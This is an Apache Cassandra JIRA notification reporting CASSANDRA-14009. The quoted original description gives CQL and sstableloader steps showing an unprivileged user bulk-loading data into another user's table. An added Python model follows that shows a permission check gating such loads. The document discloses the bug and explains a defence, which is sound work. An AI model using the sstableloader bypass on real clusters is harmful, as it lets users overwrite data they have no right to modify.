Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 14:07:00 UTC

[jira] [Updated] (CASSANDRA-14009) Any user can overwrite any table with sstableloader

     [ https://issues.apache.org/jira/browse/CASSANDRA-14009?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Andrzej Bober updated CASSANDRA-14009:
--------------------------------------
    Description: __deleted__  (was: Hi there,

Looks like any user can overwrite any table with sstableloader.
Tested ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.

{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';

cassandra@cqlsh>  CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh>  GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;

alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);

alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2', 'pass2');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3', 'pass3');

alice@cqlsh> truncate users;

alice@cqlsh> select * from db4alice.users ;
 userid | password
--------+----------
(0 rows)

sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users

alice@cqlsh> select * from db4alice.users ;

 userid | password
--------+----------
  user2 |    pass2
  user1 |    pass1
  user3 |    pass3

(3 rows)
{code}

Looks like a pretty serious bug to me.)

> Any user can overwrite any table with sstableloader
> ---------------------------------------------------
>
>                 Key: CASSANDRA-14009
>                 URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
>             Project: Cassandra
>          Issue Type: Bug
>          Components: Auth
>            Reporter: Andrzej Bober
>              Labels: security
>             Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
>
>
> __deleted__



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
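The report above shows a bulk-load (streaming) path accepting SSTables from bob, who holds no grants, while the CQL write path would have required MODIFY on db4alice.users. The following Python model is an added illustration and is not Cassandra's code or the reporter's: it reproduces the grants from the report in a small authorizer that walks the CQL resource hierarchy (data -> data/keyspace -> data/keyspace/table) and gates a bulk-load session on the same MODIFY check a CQL INSERT is subject to. The class and function names (`Authorizer`, `accept_stream`, `reproduce_report`) and the audit-log format are assumptions made for this example; the permission names and the keyspace-to-table inheritance mirror CQL GRANT semantics.

```python
"""Added example: the authorization check a bulk-load path should perform.

Models CQL-style permissions and shows that, with the grants from the
report, bob has no MODIFY on db4alice.users and a permission-aware
loader would reject his stream. Names here are hypothetical, not
Cassandra's internal API.
"""
from __future__ import annotations

from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple


class Unauthorized(Exception):
    """Raised when a bulk-load request lacks the required permission."""


# The permission set behind `GRANT ALL PERMISSIONS` on a data resource.
ALL_PERMISSIONS = frozenset(
    {"CREATE", "ALTER", "DROP", "SELECT", "MODIFY", "AUTHORIZE"}
)


def resource_chain(keyspace: str, table: Optional[str] = None) -> List[str]:
    """Return the data resource and its parents, root first.

    Mirrors the CQL hierarchy: a grant ON KEYSPACE k applies to every
    table in k, and a grant ON ALL KEYSPACES ("data") applies everywhere.
    """
    chain = ["data", f"data/{keyspace}"]
    if table is not None:
        chain.append(f"data/{keyspace}/{table}")
    return chain


class Authorizer:
    """Toy permission store keyed by (user, resource)."""

    def __init__(self) -> None:
        self._grants: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
        self.superusers: Set[str] = set()

    def grant(self, permissions: Iterable[str], resource: str, user: str) -> None:
        self._grants[(user, resource)].update(permissions)

    def permissions_on(
        self, user: str, keyspace: str, table: Optional[str] = None
    ) -> frozenset:
        """Effective permissions: union of grants along the resource chain."""
        effective: Set[str] = set()
        for resource in resource_chain(keyspace, table):
            effective |= self._grants.get((user, resource), set())
        return frozenset(effective)

    def authorize_bulk_load(self, user: str, keyspace: str, table: str) -> bool:
        """Writing SSTables into a table is a write: require MODIFY."""
        if user in self.superusers:
            return True
        return "MODIFY" in self.permissions_on(user, keyspace, table)


def accept_stream(
    auth: Authorizer, user: str, keyspace: str, table: str, audit: List[str]
) -> str:
    """Gate an incoming bulk-load session and record the decision.

    The audit line is the signal a defender would alert on: a denied
    bulk load against a table the user cannot otherwise write to.
    """
    if not auth.authorize_bulk_load(user, keyspace, table):
        audit.append(f"DENIED bulk load of {keyspace}.{table} by {user}: MODIFY required")
        raise Unauthorized(f"{user} lacks MODIFY on {keyspace}.{table}")
    audit.append(f"ACCEPTED bulk load of {keyspace}.{table} by {user}")
    return "accepted"


def reproduce_report() -> Dict[str, bool]:
    """Apply the grants from the report and decide each user's bulk load."""
    auth = Authorizer()
    auth.superusers.add("cassandra")          # the default superuser
    # GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;
    auth.grant(ALL_PERMISSIONS, "data/db4alice", "alice")
    # bob was created but never granted anything.
    return {
        user: auth.authorize_bulk_load(user, "db4alice", "users")
        for user in ("cassandra", "alice", "bob")
    }


if __name__ == "__main__":
    print(reproduce_report())  # {'cassandra': True, 'alice': True, 'bob': False}
    log: List[str] = []
    try:
        accept_stream(Authorizer(), "bob", "db4alice", "users", log)
    except Unauthorized as exc:
        print(exc)
    print("\n".join(log))
```

The keyspace-level grant is what makes alice's load succeed: `permissions_on` finds MODIFY on `data/db4alice`, one level above the table, exactly as CQL would for her INSERT statements. A grant of only SELECT on the table does not satisfy the check, which is the distinction a streaming endpoint has to preserve rather than skipping authorization altogether.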
